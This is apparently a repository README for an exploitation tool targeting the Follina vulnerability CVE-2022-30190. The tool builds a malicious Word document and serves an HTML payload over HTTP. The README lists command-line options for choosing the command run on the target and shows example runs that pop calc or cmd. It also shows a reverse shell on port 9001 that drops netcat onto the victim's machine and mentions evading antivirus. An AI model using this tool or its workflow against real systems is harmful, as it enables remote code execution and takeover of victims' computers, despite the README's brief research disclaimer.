# FOLLINA-CVE-2022-30190
Implementation of FOLLINA-CVE-2022-30190


This repository contains an exploitation tool for the vulnerability `FOLLINA-CVE-2022-30190`

### **Disclaimer**
This tool developed for security testing and research purposes.
by cloning / forking this tool the origin developer withdraw any responsibilities on the actors actions.

### **Prerequisites**
1. read about the CVE-2022-30190 from <a href="">here</a>
2. prepare your testing environment (I suggest using Virtual Box + Vagrant)
- Download VirtualBox from <a href="">here</a>  
- Download Vagrant form <a href="">here</a> 
- Read about Vagrant CLI from <a href="">here</a>

Create a "Follina" MS-MSDT attack with a malicious Microsoft Word document and stage a payload with an HTTP server.
<img src="#">

### **Usage**
usage: [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)

### **Examples**

Pop `calc.exe`:
$ python3   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

Pop `cmd.exe`:
$ python3 --command "cmd"

Get a reverse shell on port 9001. Note, this downloads a netcat binary onto the victim and places it in `C:\Windows\Tasks`. 
It does not clean up the binary. This will trigger antivirus detections unless AV is disabled.

$ python3 --reverse 9001
<img src="#">